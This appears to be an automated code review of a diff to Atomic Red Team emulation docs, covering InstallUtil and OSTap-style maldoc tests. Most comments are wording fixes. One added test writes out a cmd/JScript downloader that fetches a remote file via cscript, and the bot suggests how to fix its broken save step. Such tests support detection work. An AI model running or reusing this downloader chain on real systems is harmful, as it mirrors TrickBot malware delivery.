Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
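Review bot: same wording defect as in tests #3 and #4, "displayed the .NET framework install utility" should be "displayed for the .NET framework install utility".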
@@ -409,7 +411,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant
Executes the Uninstall Method
Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
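Review bot: same wording defect as in tests #3 to #5, "displayed the .NET framework install utility" should be "displayed for the .NET framework install utility".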
@@ -486,7 +488,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #7 - InstallUtil HelpText method call
Executes the Uninstall Method
Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil.
**Supported Platforms:** Windows
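Review bot: the retained description "Executes the Uninstall Method" does not match this test, which is "InstallUtil HelpText method call"; since the line is being edited anyway, change it to "Executes the HelpText Method. Upon execution, help information will be displayed for InstallUtil."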
@@ -563,7 +565,8 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #8 - InstallUtil evasive invocation
Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly.
Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
**Supported Platforms:** Windows
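Review bot: "opperation" in the added line "along with other information about the opperation" is misspelled; it should read "operation".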
+43 -6
@@ -10,9 +10,11 @@ While User Execution frequently occurs shortly after Initial Access it may occur
- [Atomic Test #1 - OSTap Style Macro Execution](#atomic-test-1---ostap-style-macro-execution)
- [Atomic Test #2 - Maldoc choice flags command execution](#atomic-test-2---maldoc-choice-flags-command-execution)
- [Atomic Test #2 - OSTap Payload Download](#atomic-test-2---ostap-payload-download)
- [Atomic Test #3 - OSTAP JS version](#atomic-test-3---ostap-js-version)
- [Atomic Test #3 - Maldoc choice flags command execution](#atomic-test-3---maldoc-choice-flags-command-execution)
- [Atomic Test #4 - OSTAP JS version](#atomic-test-4---ostap-js-version)
<br/>
@@ -21,7 +23,7 @@ While User Execution frequently occurs shortly after Initial Access it may occur
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
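Review bot: the removed and added lines read identically ("This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns"), so this hunk appears to be a whitespace-only change; if the line is being touched, it would also be worth adding the missing full stop at the end of the sentence.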
@@ -73,7 +75,42 @@ Stop-Process -Name WINWORD
<br/>
<br/>
## Atomic Test #2 - Maldoc choice flags command execution
## Atomic Test #2 - OSTap Payload Download
Uses cscript //E:jscript to download a file
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_file | File to execute jscript code from | Path | %TEMP%&#92;OSTapGet.js|
| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
```
#### Cleanup Commands:
```cmd
del #{script_file} /F /Q >nul 2>&1
```
<br/>
<br/>
## Atomic Test #3 - Maldoc choice flags command execution
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
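Review bot: the JScript written by the echo line references `filename` in `stream.SaveToFile(filename, 1)` but never declares or assigns it (only `url`, `fso`, `request` and `stream` are declared), so under cscript the download completes and the script then fails with a "'filename' is undefined" runtime error instead of writing the file. Either add an input such as an output path and set `filename = "#{output_file}"` in the var list, or drop the save step; `fso` is also created but never used. If an output file is introduced, the cleanup block should delete it as well as `#{script_file}`.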
@@ -123,8 +160,8 @@ Stop-Process -Name WINWORD
<br/>
<br/>
## Atomic Test #3 - OSTAP JS version
Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
## Atomic Test #4 - OSTAP JS version
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
**Supported Platforms:** Windows
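Review bot: the spelling fix "spaws" to "spawns" is good; for consistency with the command shown in test #2 (`cscript //E:Jscript`), consider writing the switch the same way here ("//E:jscript" vs "//e:jscript") and ending the sentence with a full stop.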